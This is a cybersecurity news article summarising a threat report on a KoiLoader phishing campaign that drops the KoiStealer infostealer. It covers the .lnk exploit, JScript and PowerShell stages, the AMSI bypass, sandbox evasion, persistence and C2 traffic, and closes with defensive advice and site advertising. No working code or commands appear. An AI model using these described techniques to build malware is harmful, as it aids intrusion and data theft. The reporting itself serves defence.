KoiLoader Exploits PowerShell Scripts to Drop Malicious Payloads

Cybersecurity experts at eSentire’s Threat Response Unit (TRU) uncovered a sophisticated malware campaign leveraging KoiLoader, a malicious loader designed to deploy information-stealing payloads.

This campaign utilized PowerShell scripts and obfuscation techniques to bypass security measures and infect systems.

The investigation revealed a multi-stage infection chain, highlighting the evolving tactics of cybercriminals.

Infection Chain and Delivery Mechanism

The attack begins with phishing emails containing links to zip files named “chase_statement_march.zip.”

Inside these zip files, victims encounter shortcut files (.lnk), which exploit a known Windows bug (ZDI-CAN-25373) to conceal malicious command-line arguments.

Upon execution, the shortcut file downloads two JScript files g1siy9wuiiyxnk.js and i7z1x5npc.js to the victim’s system.

These scripts orchestrate the malware’s persistence and payload delivery using scheduled tasks created through the LOLBin “schtasks.exe.”

The JScript files serve distinct purposes: g1siy9wuiiyxnk.js deletes the initial scheduled task and executes i7z1x5npc.js, while the latter retrieves PowerShell scripts from remote URLs.

According to the Report, these scripts disable security features like the Anti-Malware Scan Interface (AMSI) and download KoiLoader’s payload.

The malware ultimately executes shellcode via the CreateThread API, initiating its malicious operations.

KoiLoader’s Multi-Stage Execution

KoiLoader operates in two primary stages.

The first stage unpacks encrypted payloads stored within its PE file using a hashing algorithm to resolve Windows APIs such as FindResourceW and LoadResource.

These payloads are decrypted using XOR routines and executed in memory.

The second stage focuses on evasion and payload delivery.

It checks for virtual machine environments, security researcher tools, and sandbox attributes to avoid detection.

Additionally, it ensures the malware runs exclusively on non-Russian systems by verifying language settings.

Once evasion checks are passed, KoiLoader establishes persistence through scheduled tasks and creates mutexes based on the victim machine’s volume serial number to prevent duplicate instances.

It then downloads and executes KoiStealer, an advanced information-stealing malware written in C#.

KoiStealer extracts sensitive data such as machine GUIDs, usernames, OS versions, and domain information before communicating with Command-and-Control (C2) servers.

KoiLoader employs HTTP POST requests for C2 communication.

The initial request includes the victim machine’s GUID, campaign-specific build ID, and an X25519 public key for encrypted data exchange.

Subsequent requests retrieve commands encoded as single characters, enabling actions such as script execution via PowerShell or Command Prompt, process injection into explorer.exe or certutil.exe, and dynamic DLL loading.

To counter threats like KoiLoader, eSentire recommends disabling wscript.exe via AppLocker or Windows Defender Application Control (WDAC).

Organizations should implement behavior-based detection mechanisms alongside robust phishing awareness training programs to mitigate social engineering risks.

Deploying Next-Gen Antivirus (NGAV) or Endpoint Detection and Response (EDR) solutions is critical for detecting and containing advanced threats.

This discovery underscores the importance of proactive threat hunting and advanced cybersecurity measures in combating modern malware campaigns.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup – Try for Free

Keep your files stored safely and securely with the SanDisk 2TB Extreme Portable SSD. With over 69,505 ratings and an impressive 4.6 out of 5 stars, this product has been purchased over 8K+ times in the past month. At only $129.99, this Amazon’s Choice product is a must-have for secure file storage.

Help keep private content private with the included password protection featuring 256-bit AES hardware encryption. Order now for just $129.99 on Amazon!

Help Power Techcratic’s Future – Scan To Support

If Techcratic’s content and insights have helped you, consider giving back by supporting the platform with crypto. Every contribution makes a difference, whether it’s for high-quality content, server maintenance, or future updates. Techcratic is constantly evolving, and your support helps drive that progress.

As a solo operator who wears all the hats, creating content, managing the tech, and running the site, your support allows me to stay focused on delivering valuable resources. Your support keeps everything running smoothly and enables me to continue creating the content you love. I’m deeply grateful for your support, it truly means the world to me! Thank you!